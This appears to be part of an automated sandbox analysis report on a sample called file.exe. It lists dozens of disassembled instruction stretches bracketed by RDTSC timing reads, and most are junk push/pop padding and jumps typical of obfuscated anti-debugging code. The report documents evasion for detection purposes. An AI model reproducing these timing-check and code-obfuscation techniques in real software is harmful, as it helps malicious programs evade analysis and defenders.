Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B06D77 second address: B06D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD184FDBE80h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B06D91 second address: B06DA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007FD185A97D06h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FD185A97D06h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07C50 second address: B07C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD184FDBE88h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07C71 second address: B07C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07C75 second address: B07C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD184FDBE82h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07C8D second address: B07CA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D14h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07CA6 second address: B07CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0B56F second address: B0B57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FD185A97D06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0B57E second address: B0B582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0B582 second address: B0B58C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD185A97D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0B58C second address: B0B592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9B7BF second address: A9B7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B100DE second address: B100EA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD184FDBE7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B100EA second address: B100F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B100F4 second address: B100F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDC06 second address: ADDC72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jmp 00007FD185A97D0Eh 0x00000010 nop 0x00000011 mov ecx, dword ptr [ebp+122D1E91h] 0x00000017 lea eax, dword ptr [ebp+1249196Fh] 0x0000001d js 00007FD185A97D0Ch 0x00000023 mov dword ptr [ebp+122D1C09h], eax 0x00000029 nop 0x0000002a jmp 00007FD185A97D11h 0x0000002f push eax 0x00000030 pushad 0x00000031 jmp 00007FD185A97D10h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FD185A97D0Bh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDD4B second address: ADDD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE191 second address: ADE197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE217 second address: ADE274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jg 00007FD184FDBE7Ch 0x00000013 push esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop esi 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a js 00007FD184FDBE87h 0x00000020 jmp 00007FD184FDBE81h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 jmp 00007FD184FDBE80h 0x0000002e pop eax 0x0000002f mov edx, dword ptr [ebp+122D1E18h] 0x00000035 push 4E6F16D2h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE274 second address: ADE278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE278 second address: ADE27E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE36F second address: ADE3A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD185A97D12h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 js 00007FD185A97D06h 0x00000016 pop eax 0x00000017 push esi 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pop esi 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d mov cx, 8921h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jnp 00007FD185A97D08h 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE563 second address: ADE567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE6FD second address: ADE701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADEADB second address: ADEB01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD184FDBE89h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADEC6F second address: ADEC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADEEBB second address: AC0FE7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD184FDBE84h 0x00000008 jmp 00007FD184FDBE7Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FD184FDBE7Fh 0x00000015 nop 0x00000016 mov dx, ax 0x00000019 lea eax, dword ptr [ebp+124919B3h] 0x0000001f jmp 00007FD184FDBE87h 0x00000024 mov edx, ebx 0x00000026 nop 0x00000027 jc 00007FD184FDBE7Ah 0x0000002d push eax 0x0000002e pushad 0x0000002f popad 0x00000030 pop eax 0x00000031 push eax 0x00000032 jg 00007FD184FDBE7Eh 0x00000038 nop 0x00000039 sub ecx, dword ptr [ebp+122D2CB6h] 0x0000003f lea eax, dword ptr [ebp+1249196Fh] 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007FD184FDBE78h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f push esi 0x00000060 mov edx, 729A2517h 0x00000065 pop ecx 0x00000066 push eax 0x00000067 jmp 00007FD184FDBE88h 0x0000006c mov dword ptr [esp], eax 0x0000006f or dword ptr [ebp+122D2812h], esi 0x00000075 call dword ptr [ebp+122D2363h] 0x0000007b push eax 0x0000007c push edx 0x0000007d js 00007FD184FDBE89h 0x00000083 push ebx 0x00000084 pop ebx 0x00000085 jmp 00007FD184FDBE81h 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B103C2 second address: B103C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B10517 second address: B10520 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B10662 second address: B10679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 jmp 00007FD185A97D0Bh 0x0000000c popad 0x0000000d push ecx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B10BC9 second address: B10BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD184FDBE86h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B10D85 second address: B10DB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Dh 0x00000007 jmp 00007FD185A97D18h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B10DB4 second address: B10DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B127E8 second address: B12807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD185A97D06h 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FD185A97D0Fh 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B12807 second address: B1280D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94DB7 second address: A94DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94DBC second address: A94DCC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD184FDBE82h 0x00000008 jng 00007FD184FDBE76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B196B9 second address: B196BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B196BD second address: B196C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B196C3 second address: B196E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B196E3 second address: B196F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007FD184FDBE76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B199B7 second address: B199C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FD185A97D06h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B199C6 second address: B199CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1A25F second address: B1A263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1A263 second address: B1A26D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD184FDBE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1A26D second address: B1A29A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD185A97D0Fh 0x0000000c jmp 00007FD185A97D0Ah 0x00000011 jbe 00007FD185A97D06h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1A417 second address: B1A41C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1A56F second address: B1A575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1A575 second address: B1A57B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B192A4 second address: B192BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1D8BD second address: B1D8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1D8C3 second address: B1D8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B21645 second address: B21649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B21649 second address: B2164F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2164F second address: B21655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2582D second address: B25837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD185A97D06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25837 second address: B2584B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD184FDBE76h 0x00000008 jng 00007FD184FDBE76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2584B second address: B2584F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2584F second address: B25855 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25AE0 second address: B25AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25AE6 second address: B25B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD184FDBE85h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25B06 second address: B25B0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25B0C second address: B25B19 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD184FDBE78h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25B19 second address: B25B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D11h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FD185A97D10h 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25C46 second address: B25C55 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25DA5 second address: B25DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25DB4 second address: B25DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25DB8 second address: B25DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25DBE second address: B25DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007FD184FDBE88h 0x0000000d js 00007FD184FDBE78h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A717 second address: B2A71B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A71B second address: B2A725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29E83 second address: B29EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FD185A97D13h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29EA1 second address: B29EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE88h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29EBD second address: B29ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FD185A97D06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29ECD second address: B29ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30BA6 second address: B30BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2F3D4 second address: B2F3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2F7F0 second address: B2F806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD185A97D0Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2F806 second address: B2F80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2F9A0 second address: B2F9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FD185A97D06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2F9AE second address: B2F9B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2F9B3 second address: B2F9B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2FB57 second address: B2FB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2FB5B second address: B2FB63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2FB63 second address: B2FBB2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD184FDBE86h 0x00000008 jno 00007FD184FDBE76h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007FD184FDBE7Ch 0x00000019 jc 00007FD184FDBE8Fh 0x0000001f push edx 0x00000020 pop edx 0x00000021 jmp 00007FD184FDBE87h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADEA9B second address: ADEADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FD185A97D08h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov di, cx 0x00000024 push 0000001Eh 0x00000026 mov edi, edx 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c je 00007FD185A97D06h 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3814B second address: B38153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3623A second address: B36242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B36814 second address: B36822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FD184FDBE76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B36822 second address: B36826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B36826 second address: B36834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B36834 second address: B3683A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3683A second address: B3684B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD184FDBE7Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B36B4E second address: B36B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
